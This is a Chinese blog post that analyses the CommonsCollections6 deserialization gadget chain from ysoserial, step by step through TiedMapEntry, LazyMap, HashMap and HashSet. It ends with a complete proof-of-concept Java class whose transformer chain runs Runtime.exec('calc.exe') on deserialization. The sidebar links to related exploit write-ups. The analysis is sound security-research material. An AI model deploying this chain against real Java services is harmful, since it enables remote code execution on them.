ysoserial CommonsColletions6分析

最新推荐文章于 2022-12-08 12:38:25 发布
最新推荐文章于 2022-12-08 12:38:25 发布
阅读量134 收藏
点赞数
分类专栏: JAVA安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/118639019
版权

CC6的话是一条比较通用的链,在JAVA7和8版本都可以使用,而触发点也是通过LazyMap的get方法。

TiedMapEntry#hashCode

在CC5中,通过的是TiedMapEntry的toString调用到的LazyMap的get方法,而CC6则是通过TiedMapEntry的hashCode方法

image-20210710172147902

此处hashCode会调用getValue方法,getValue就调用到了LazyMap的get方法

image-20210710172240299

接下来我们要找的就是哪里调用了TiedMapEntry#hashCode

HashMap#put

HashMap每次进行put的时候,会计算 keyhash

image-20210710172744443

进入到hash方法,看到调用了hashcode

image-20210710172820834

hashSet#readObject

hashSet作为反序列化入口,在重写的readObject中调用了map.put

image-20210710173431028

此处的map是在readObject中第299-301行进行的赋值

image-20210710173523810

这个代码其实判断this是不是LinkedHashSet,不是的话就返回HashMap类型的对象

综合以上,map值为HashMap即可调用put

构造poc

前面的写法都一样,lazyMap传入了TiedMapEntry中

        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);

        HashMap hashMap = new HashMap();
        LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap, chain);
        TiedMapEntry mapEntry = new TiedMapEntry(lazyMap, "xxx");

通过hashSet.add把mapEntry加入进hashSet

HashSet hashSet = new HashSet(1);
hashSet.add(mapEntry);

到这里就已经构造完了,但是会发现poc在执行反序列化的时候无法弹出计算器,原因是在LazyMap的get方法中

image-20210710175425859

这句话的意思是判断有没有key,有key的话则不会执行if里面的方法。

查找key传入路径发现,这里的key是在TiedMapEntry#getValue中传入的

image-20210710175655911

而这个key则是在构造方法中进行的赋值

image-20210710175833369

也就是之前操作时候,传入的"xxx"

image-20210710175957126

由于在hashSet.add的时候,会调用一遍TiedMapEntry#getValue把key传入了进去

所以我们只需要在add之后,把lazyMap里面的key给remove就可以了

image-20210710180400221

整个POC就构造出来了

public class payload01 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);

        HashMap hashMap = new HashMap();
        LazyMap lazyMap = (LazyMap) LazyMap.decorate(hashMap, chain);
        TiedMapEntry mapEntry = new TiedMapEntry(lazyMap, "xxx");

        HashSet hashSet = new HashSet(1);
        hashSet.add(mapEntry);

        lazyMap.remove("xxx");

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(hashSet);
        oos.close();

//        System.out.println(barr);
//        System.out.println(barr.toString());
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        ois.readObject();
    }
}

和CC5一样,如果要在CommonsCollections4.0版本中使用的话,需要把poc中的lazymap传值方式改变下就行了!

image-20210710170229870

测试环境在JDK1.7和1.8,CommonsCollections3.1-3.21,4.0均测试成功

洋洋cc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ysoserial CommonsColletions5分析
洋洋的小黑屋
07-10 122
我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写。 所以要挖掘出一条能替代的类BadAttributeValueExpException 在CC5中除了有一个新的类BadAttributeValueExpException外,还有一个新的类TiedMapEntry,用来调用LazyMap的get方法 TiedMapEntry 在TiedMapEntry的getValue方法中调用了get方法 而map成员变量则是由构造函数传入
java反序列化工具ysoserial.jar浅析
qq_50854662的博客
02-13 613
java反序列化工具ysoserial.jar浅析
『Java安全』反序列化-CC6反序列化漏洞POP链分析_ysoserial CommonsCollections6 PoC分析
Ho1aAs‘s Blog
03-13 577
文章目录前言代码复现工具类PoC代码审计 | 原理分析TiedMapEntry.hashCode()调用toString()方法POP链完 前言 CC6触发TiedMapEntry.hashcode(),非常简单因此只做记录 代码复现 工具类 反序列化: UnserializePacked.Unserialize.java package UnserializePacked; import java.io.*; public class Unserialize { public static v
Java安全--CC1的补充和CC6
qq_64201116的博客
12-08 1168
我们看一下两条链子的分歧在哪里:从ChainedTransformer.transform()开始往下和上一次讲的链子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler需要利用的点在AnnotationInvocationHandler的invoke()里面,而学完动态代理我们知道Invocat
Javaweb安全——反序列化漏洞-CC6
weixin_43610673的博客
06-01 784
本文环境为 JDK8u11现在开始学习,Java 8u71之后,即高版本Java利用链,从CommonCollections6开始在 8u71之后AnnotationInvocationHandler的逻辑变成新建了一个LinkedHashMap对象,并将原来的键值添加进去,传进去的恶意Map不再执行set或put操作。而是通过invoke方法触发其get方法开始的,所以需要一个新的触发get方法的点,先看ysoserial当中CC6的 通过去触发get方法直接搜get,找到方法 查找其调用,跟踪到方法 要
Commons-Collections6 反序列化 从0开始手写exp
weixin_51458899的博客
04-11 2125
CC6 cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行 ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com) 如何手写exp 可以看到 后半段仍然与yso的cc1一致(一直到LazyMap.get) 调用了TiedMapEntry,进去 hashcode里面调用了getvalue 这里是map.get key对应的value如果改成恶
ysoserial.jar
12-16
ysoserial 是安全测试 playload 生成工具
ysoserial-0.0.6
02-11
ysoserial-0.0.6
ysoserial下载
12-26
java反序列化漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
ysoserial-0.0.2
12-25
weblogic反序列化漏洞 测试用的 有需要的同学拿去用
手工编写简化版CommonsCollections6,带你实现Java8全版本反序列化利用
离别歌
07-24 702
这是代码审计知识星球中《Java安全漫谈》的第十二篇文章。本文带大家编写一个简化版的CommonsCollections6利用链,代码量相比于ysoserial减少50%,能够让大家更好...
JAVA反序列化漏洞简单理解
秋水的博客
09-26 3716
反序列化原理 关于反序列化的原理不在多说,和php类似,序列化的数据是方便存储的,而存储的状态信息想要再次调用就需要反序列化 Java反序列化的API实现 实现方法 Java.io.ObjectOutputStream java.io.ObjectInputStream 序列化: ObjectOutputStream类 -->writeObject() 注:...
Commons Collections Java反序列化漏洞深入分析
大树叶 技术专栏
04-27 1万+
http://www.myhack58.com/Article/html/3/62/2015/69493.htm 今年目前为止Java方面影响力最大的漏洞莫过于这段时间持续火热的CommonsCollections反序列化漏洞了。 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Com
Java安全学习笔记--基于ysoserial反序列化利用工具CC2和CC5链构造方式的思考
m0_64685672的博客
02-02 2524
前言:ysoserial反序列化利用工具的CC5链和CC6链的利用链核心都还是LazyMap+ChainedTransformer,两条利用链通过TideMapEntry的toString和hashCode方法来触发核心利用链,最终触发get方法 把三个方法放一块 public V getValue() { return this.map.get(this.key);//这里的this.map就是我们的LazyMap } //LazyMap的get方法: public V get(Object
使用ysoserial生成反序列化文件
热门推荐
一个码农的笔记
06-01 2万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
泛微OA E-cology(CNVD-2019-32204)远程命令执行漏洞复现分析
洋洋的小黑屋
03-16 2571
漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2.字符串拼接 bsh.script=eval%00("ex"%2b"ec(bsh.httpSer...
weblogic漏洞分析之CVE-2016-0638
洋洋的小黑屋
08-17 2146
weblogic漏洞分析之CVE-2016-0638 一、环境搭建: 这里使用前一篇文章的环境,然后打上补丁 上一篇文章:https://www.cnblogs.com/yyhuni/p/15137095.html 下载补丁p20780171_1036_Generic和p22248372_1036012_Generic 解压补丁后,复制补丁到Docker中: docker cp ./p22248372_1036012_Generic/ d1b6be39e32e:/home/ docker cp ./p2
JAVA反序列化漏洞基础原理
洋洋的小黑屋
05-11 1574
JAVA反序列化漏洞基础原理 1.1 什么是序列化和反序列化? Java序列化是指把Java对象转换为字节序列的过程; Java反序列化是指把字节序列恢复为Java对象的过程; 1.2 为什么要序列化 对象不只是存储在内存中,它还需要在传输网络中进行传输,并且保存起来之后下次再加载出来,这时候就需要序列化技术。 Java的序列化技术就是把对象转换成一串由二进制字节组成的数组,然后将这二进制数据...
ysoserial安装
最新发布
08-16
6. 构建 ysoserial 的 JAR 文件。运行以下命令: ``` mvn clean package -DskipTests ``` 7. 构建完成后,在 `target` 文件夹下会生成一个名为 `ysoserial-[version].jar` 的 JAR 文件,其中 `[version]` 是 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值